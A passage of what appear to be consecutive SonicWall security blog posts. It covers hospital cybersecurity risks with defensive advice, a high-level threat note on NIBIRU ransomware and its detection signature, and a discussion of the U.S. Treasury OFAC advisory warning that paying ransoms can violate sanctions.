In other words, patching, updating or otherwise altering these devices nullifies the approval. To get around this security hurdle, hospitals make extensive use of firewalls: Without them, having a device on the network that can make the difference between life and death, but can also contain unpatchable vulnerabilities, would simply be too big a liability.

… Plus All the Usual Suspects

If that wasn’t enough, hospitals still have to contend with the standard IT hazards, such as phishing, ransomware and remote work risks. Hospital IT should be the last line of defense against phishing — busy doctors and nurses can’t be expected to investigate the legitimacy of emails when every second spent doing so is one less spent on patient care.

But given the massive uptick in attacks targeting hospitals, the number of phishing emails that get through and successfully fool employees is on the rise. According to Healthcare Finance, during a recent study employees clicked on roughly 1 in 7 simulated phishing emails, putting hospitals at risk for threats such as credential theft and ransomware.

And ransomware has the potential to be especially devastating for hospitals. Taking the billing department offline for a week can put any hospital in a tight spot, or in the case of smaller hospitals, even drive them to bankruptcy. And without the ability to collect or access patient data, facilities have to turn patients away — which can be deadly.

How hospitals, healthcare organizations can improve security hygiene

While more devices necessarily means more risk, these risks can be mitigated. One way is through network segmentation. By isolating different parts of the care practice, hospitals could reduce the potential destructiveness of cyberthreats. And with fewer people able to access each piece of patient data, privacy risks would be reduced as well.

There are also several steps individuals can take:

  • Keep devices patched and up to date. This is a good habit in general, but it’s crucial when accessing hospital networks from home.
  • Deploy a firewall for your home network. (Even the one built into Windows offers some protection.)
  • Use next-generation antimalware protection. Today’s advanced threats can bypass traditional signature-based antivirus software.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations in every industry protect against the threats of today and prepare for the threats of tomorrow. To learn more, check back next week as we explore what future threats could look like, and how we as individuals can help prevent them.

Nibiru ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of NIBIRU ransomware [NIBIRU.RSM] actively spreading in the wild.

The NIBIRU ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Name].<NIBIRU>

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When NIBIRU is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [NIBIRU] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: NIBIRU.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Another Reason to Not Pay the Ransom: Trouble with Uncle Sam

It’s an idea so ingrained in our culture that it’s been repeated by action movie stars, debated at length by political scholars, and cited in literature from young-adult fiction to parenting advice books: Do not negotiate with terrorists.

The rationale, according to Peter R. Neumann, director of the Center for Defense Studies at King’s College, London, is simple: “Democracies must never give in to violence, and terrorists must never be rewarded for using it. Negotiations give legitimacy to terrorists … undercut international efforts to outlaw terrorism, and set a dangerous precedent.”

If you’re an everyday civilian, it’s hard to imagine any practical application for this knowledge aside from the occasional action movie daydream. But there is, in fact, a situation in which everyday people are routinely given the choice of whether to negotiate with criminals: Ransomware.

Ransomware is a growing problem, and the COVID-19 pandemic seems to have accelerated this growth. According to the mid-year update to the SonicWall Cyber Threat Report, ransomware overall rose 20% during the first half of 2020. While some areas, such as the U.K., saw a year-over-year decline, the spike in ransomware in North America more than made up for it. The U.S., in particular, saw a staggering 109% increase in ransomware during the first half of 2020.

Last year, the monthly ransomware totals followed a neat, sine-wave-like pattern. In 2020, the numbers have been much more erratic. The late summer trough of 2019 never materialized this year — instead, numbers reversed course in July and have been skyrocketing since. The data from September, the most recent data we have, shows a staggering 34,112,981 ransomware attacks — more than double the total for September of last year. It’s too soon to see what the totals for October will be, but if the trends from last year hold, that number could climb even higher.

Worse still, the percentage of overall attacks focused on SMBs, education, local governments, public administration agencies, and even hospitals has been increasing as well. Because these organizations are usually smaller, and are working within tighter budgets, they often lack the security of larger companies — meaning ransomware attempts are more likely to succeed.

Should you pay a ransomware ransom?

Modern companies are built on, depend on and, in some cases, owe their existence to data. Faced with the prospect of starting over from square one, enduring major operational disruption and facing damage to customer relationships and reputation, some ransomware victims are tempted to pay the ransom just to make the problem go away.

But this isn’t advisable, for several reasons. For one, the criminals could simply abscond with your money — while ransomware operators tend to uphold their end of the bargain based on a very twisted concept of honor, not all do. Even dealing with an “ethical” ransomware operator gives no guarantees — it isn’t at all rare for the decryption key to be granted, only for the victim to find it didn’t decrypt the data entirely … or at all. According to a recent survey by research and marketing firm CyberEdge Group, nearly 1 in 5 ransomware victims surveyed paid the ransom and still lost all their data for good.

There’s also the matter of reinforcement: If you pay the ransom, your experience becomes a case study in why ransomware works and is a profitable and worthwhile undertaking. The more successful ransomware appears to be, the more attractive it becomes to those wishing to make a quick buck — potentially for the purpose of funding even more unsavory activities.

But if all of this isn’t enough of a deterrent — and obviously for some companies it isn’t, or we wouldn’t still be seeing ransomware — there’s also the chance that paying the ransom could get you in trouble with Uncle Sam.

On Oct. 1, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) issued an advisory stating that in some cases, paying ransoms could be illegal. Any organizations that do so — regardless of whether it’s the victim company or a third party that facilitated the ransom payment — could be violating OFAC regulations and thus be subject to prosecution and hefty fines.

At issue here isn’t the payment of the ransom itself — it’s who the ransom is going to. The U.S. Department of the Treasury administers sanctions against countries and regimes, terrorists, and others recognized as threats to national security or the U.S. economy based on U.S. foreign policy and national security goals. These individuals, groups and entities are recorded in the OFAC Sanctions List — which includes “numerous malicious cyber actors under its cyber-related sanctions program and other sanctions programs, including perpetrators of ransomware attacks and those who facilitate ransomware transactions,” according to the advisory.

In short, if the ransomware you’re infected with has been associated with an individual or group deemed to be a threat to the United States, paying the ransom could leave you facing penalties of your own.

Among the groups and individuals mentioned by name are some of the most well-known and prolific cybercriminals: Evgeniy Mikhailovich Bogachev (developer of Cryptolocker), individuals associated with the SamSam ransomware, the Lazarus Group and two subgroups (linked to WannaCry), and Evil Corp (cited for its involvement with Dridex malware, but also recently connected with WastedLocker). Note, however, that these were listed as examples, and not an all-inclusive list: There are other cybercriminals on the list, and more could be added at any time.

While the advisory does state that “a company’s self-initiated, timely and complete report of a ransomware attack to law enforcement” could be considered a significant mitigating factor in evaluating possible enforcement, remember that even in a best-case scenario — one that results in no federal fines or penalties whatsoever — you’re still left between ransomware’s proverbial rock and a hard place. In other words, by the time you’re impacted by ransomware, there are no good options left. Your opportunity for a “good” outcome to a ransomware attack depends entirely on the actions you take before the fact.

Fortunately, there are many things you can do to nip ransomware in the bud, including regular patching, creating and maintaining quality backups, implementing employee education initiatives and more.

In the meantime, follow the latest trends in ransomware, such as where and how ransomware operators are attacking, by checking out the mid-year update of the SonicWall 2020 Cyber Threat Report.